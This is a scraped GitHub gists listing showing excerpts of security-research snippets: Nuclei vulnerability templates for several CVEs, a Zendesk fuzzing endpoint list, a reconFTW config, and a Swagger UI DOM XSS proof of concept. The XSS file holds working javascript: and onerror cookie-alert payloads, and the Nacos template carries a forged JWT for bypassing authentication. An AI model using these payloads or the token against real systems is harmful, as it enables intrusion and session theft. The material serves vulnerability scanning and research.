Skip to content

Instantly share code, notes, and snippets.

View emadshanab's full-sized avatar
🏠
Working from home

Emad Shanab emadshanab

🏠
Working from home
626 followers · 272 following
View GitHub Profile
@ripp3rdoc
ripp3rdoc / CVE-2019-18935.yaml
Last active March 27, 2024 08:59
Telerik UI Insecure Deserialization — Nuclei Template
id: CVE-2019-18935
info:
name: Deserialization Vulnerability in Telerik UI for ASP.NET AJAX.
author: Talson
severity: critical
description: |
Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution.
remediation: |
As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.
reference:
@hxlxmjxbbxs
hxlxmjxbbxs / CVE-2023-36845.yaml
Created September 20, 2023 04:15
Nuclei Template For Juniper Networks Junos OS PHP External Variable Modification Vulnerability
id: CVE-2023-36845
info:
name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
author: hxlxmj
severity: medium
description: |
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-36845
@0x240x23elu
0x240x23elu / CVE-2023-26255.yaml
Created August 26, 2023 02:22
CVE-2023-26255
id: CVE-2023-26255
info:
name: Stagil navigation for jira - Local File Inclusion
author: 0x240x23elu
severity: high
description: Prior to version 2.0.52 of the “Stagil navigation for jira – Menù & Themes", the fileName parameter is vulnerable to a "Directory Traversal" that would allow an attacker to read files on the server knowing their path
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
@win3zz
win3zz / zendesk_endpoints.txt
Created July 18, 2023 09:01
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
POST /api/v2/accounts
GET /api/v2/activities?since=cstest
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
GET /api/v2/automations
POST /api/v2/automations
GET /api/v2/bookmarks
POST /api/v2/bookmarks
GET /api/v2/brands
POST /api/v2/brands
GET /api/v2/custom_objects
@Esonhugh
Esonhugh / maltrail-command-injection.nuclei.yaml
Created July 10, 2023 17:28
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
id: maltrail-os-command-injection
info:
author: Esonhugh
name: Unauthenticated OS Command Injection in stamparm/maltrail
severity: critical
description: |
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
reference:
- "https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/"
@Esonhugh
Esonhugh / nacos_bypass_nuclei_template.yaml
Last active December 18, 2023 06:50
nacos default jwt secret encryption vuln nuclei poc leaking all passwords and create user automatically exploit.
id: nacos-bypass-authentication
variables:
#token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.vqhkMLKmquQ6R5AD6VWrTOqgClC599nnAQgQLHhPcLc
# token is signed with a very long time expire.
# token exp -1
token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6LTF9.ybUomrBRXZhbUMWVgXRz3Q6zndbF-Zdk4RGpCnV-Ofs
info:
name: Nacos Bypass Auth with default jwt secret
@jhaddix
jhaddix / reconftw.cfg
Last active June 24, 2024 04:55
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator
@zenelite123
zenelite123 / xss.json
Created January 13, 2023 15:19
{
"url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml",
"name": "Foo"
}
]
}
@zenelite123
zenelite123 / xss.yaml
Created January 13, 2023 15:17
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "0.0.1"
title: DOM XSS PoC
description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">'
termsOfService: "javascript:alert(document.cookie)"
@zenelite123
zenelite123 / test.json
Created January 13, 2023 05:18
{
"url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
"name": "Test"
}
]
}